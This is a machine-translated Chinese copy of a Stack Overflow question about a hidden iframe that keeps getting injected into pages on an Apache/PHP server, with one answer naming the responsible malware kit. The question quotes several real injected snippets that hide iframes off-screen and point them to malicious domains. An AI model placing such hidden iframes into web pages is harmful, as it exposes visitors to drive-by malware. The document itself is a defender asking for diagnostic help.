- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
几个月前,一个隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点关闭进行维护时,iFrame 仍然在关闭维护页面上。最终,宿主封锁了 iFrame 的来源,但我们始终没有找到后门。注入(inject)的 iFrame 看起来像这样,但包裹在样式标签中以进行混淆并带有各种 URL:
iframe src="http://heusnsy.nl/32283947.html..
我们将较小的站点移到了不同的主机上,它们都很好。
我们将主站点移至同一主机上的新专用服务器,尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 返回。
我们到处寻找它是如何进入的——配置文件、htaccess——但找不到它。
知道隐藏的 iFrame 注入(inject)漏洞在哪里吗?
编辑:以下是更多详细信息:运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入(inject)的代码如下所示:
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新:以下是更多信息和我们学到的知识:
主机:Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64/Apache 版本 2.2.15 - PHP 5.3.3 (cli)(构建时间:2012 年 7 月 3 日 16:53:21)
服务器本身没有受到损害。
包括 (apache/php) 在内的所有服务都已升级到我们系统可用的最新版本。
没有帐户(ftp 或其他方式)受到损害。
恶意软件会同时更改多个受感染网站的目标 URL (iframe src=)。 (由 unmaskparasites.com 提供)
在更改 src 目标期间,没有执行/运行流氓或隐藏进程。
TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码,但在接收恶意软件的用户的 GET 请求中没有发现任何异常 - 在相应的 apache 访问日志中也没有发现异常。
在 iFrame 的 src url 地址切换期间,网站文件或 httpd/php 二进制文件未以任何方式更改 - 由 md5sum 检查提供。
在更改期间,未在已知服务的已知端口上建立恶意连接。防火墙负责其余的工作。
rkhunter 和 maldet 没有得出任何结果。
恶意软件 iFrame 在第一个 "</script>"
之后立即被触发和注入(inject)在此服务器上的所有帐户和网站上,任何具有此标签的页面上的标签。
恶意软件被注入(inject)到静态页面和没有数据库连接的网站上。 (页面有<head> </script></head>
标签就够了)
没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块已暂停并被注释掉。
恶意软件不会一直存在。它来来去去,有时会关闭几个小时,然后为多个用户出现并再次熄灭。使其极难追踪。
我们网站上运行的 100% 的 php 代码和大部分 javascript 代码(phpmyadmin 代码除外)都是自定义编码的。唯一没有的是 Jquery 库。
服务器是高流量机器,在日志中搜索/匹配非常慢。每周访问日志可以超过 15GB。
情况就是这样……这不再是帐户被盗、文件被黑、恶意脚本的问题。这超出了我们目前所见,原因隐藏在 apache/php 本身的某处。 (至少这是我们的想法)。非常感谢任何帮助或想法。
以下是 iFrame 注入(inject)的示例:
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>
最佳答案
检查一下...劫持您的服务器的程序的恶作剧作者被称为“Left4Dead”——他的 iframe 注入(inject) doo-hicky 被称为“BlackLeech”。您可以在 Damagelab .org(CRIMINAL FORUM!!)上找到这位先生和他的广告。
每次 root 登录时,恶意软件都会停止所有事件,或者如果您通过 SSH 连接到您的服务器。它还监控系统监控工具:|
notice how your thread is listed as a reference :))
if you need help with translation, hit me up!
关于security - iFrame 注入(inject)攻击跟踪我们到新服务器,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11955634/
我想知道有没有可能做 new PrintWriter(new BufferedWriter(new PrintWriter(s.getOutputStream, true))) 在 Java 中,s
我正在尝试使用 ConcurrentHashMap 初始化 ConcurrentHashMap private final ConcurrentHashMap > myMulitiConcurrent
我只是想知道两个不同的新对象初始化器之间是否有任何区别,还是仅仅是语法糖。 因此: Dim _StreamReader as New Streamreader(mystream) 与以下内容不同: D
在 C++ 中,以下两种动态对象创建之间的确切区别是什么: A* pA = new A; A* pA = new A(); 我做了一些测试,但似乎在这两种情况下,都调用了默认构造函数,并且只调用了它。
我已经阅读了其他帖子,但它们没有解决我的问题。环境为VB 2008(2.0 Framework)下面的代码在 xslt.Load 行导致 XSLT 编译错误下面是错误的输出。我将 XSLT 作为字符串
我想知道为什么alert(new Boolean(false))打印 false 而不是打印对象,因为 new Boolean 应该返回对象。如果我使用 console.log(new Boolean
本文实例讲述了Python装饰器用法。分享给大家供大家参考,具体如下: 写装饰器 装饰器只不过是一种函数,接收被装饰的可调用对象作为它的唯一参数,然后返回一个可调用对象(就像前面的简单例子) 注
我可以编写 YAML header 来使用 knit 为 R Markdown 文件生成多种输出格式吗?我无法重现 the original question with this title 的答案中
我可以编写一个YAML标头以使用knitr为R Markdown文件生成多种输出格式吗?我无法重现the original question with this title答案中描述的功能。 这个降价
我正在使用vars package可视化脉冲响应。示例: library(vars) Canada % names ir % `$`(irf) %>% `[[`(variables[e])) %>%
我有一个容器类,它有一个通用参数,该参数被限制到某个基类。提供给泛型的类型是基类约束的子类。子类使用方法隐藏(新)来更改基类方法的行为(不,我不能将其设为虚拟,因为它不是我的代码)。我的问题是"new
Java 在提示! cannot find symbol symbol : constructor Bar() location: class Bar JPanel panel =
在我的应用程序中,一个新的 Activity 从触摸按钮(而不是点击)开始,而且我没有抬起手指并希望在新的 Activity 中跟踪触摸的 Action 。第二个 Activity 中的触摸监听器不响
已关闭。此问题旨在寻求有关书籍、工具、软件库等的建议。不符合Stack Overflow guidelines .它目前不接受答案。 我们不允许提问寻求书籍、工具、软件库等的推荐。您可以编辑问题,
和我的last question ,我的程序无法检测到一个短语并将其与第一行以外的任何行匹配。但是,我已经解决并回答了。但现在我需要一个新的 def函数,它删除某个(给定 refName )联系人及其
这个问题在这里已经有了答案: Horizontal list items (7 个答案) 关闭 9 年前。
我想创建一个新的 float 类型,大小为 128 位,指数为 4 字节(32 位),小数为 12 字节(96 位),我该怎么做输入 C++,我将能够在其中进行输入、输出、+、-、*、/操作。 [我正
我在放置引用计数指针的实例时遇到问题 类到我的数组类中。使用调试器,似乎永远不会调用构造函数(这会扰乱引用计数并导致行中出现段错误)! 我的 push_back 函数是: void push_back
我在我们的代码库中发现了经典的新建/删除不匹配错误,如下所示: char *foo = new char[10]; // do something delete foo; // instead of
A *a = new A(); 这是创建一个指针还是一个对象? 我是一个 c++ 初学者,所以我想了解这个区别。 最佳答案 两者:您创建了一个新的 A 实例(一个对象),并创建了一个指向它的名为 a
我是一名优秀的程序员,十分优秀!